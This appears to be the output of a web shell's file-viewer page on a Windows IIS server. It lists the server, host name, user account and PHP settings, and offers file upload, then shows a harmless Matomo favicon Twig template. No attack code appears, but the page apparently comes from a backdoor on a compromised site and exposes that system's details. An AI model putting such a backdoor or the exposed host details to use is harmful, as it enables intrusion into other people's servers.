HEX
Server: Microsoft-IIS/10.0
System: Windows NT ITPWINWEBSVR22 10.0 build 20348 (Windows Server 2022) AMD64
User: www.conferencesearch.co.uk (0)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: D:/web/matomo.circ/plugins/CoreHome/templates/_favicon.twig
{% if isCustomLogo and customFavicon is defined and customFavicon %}
    <link rel="shortcut icon" href="{{ customFavicon }}"/>
{% else %}
    <link rel="shortcut icon" href="plugins/CoreHome/images/favicon.png"/>
    <link rel="icon" type='image/png' sizes='256x256' href="plugins/CoreHome/images/applogo_256.png"/>
{% endif %}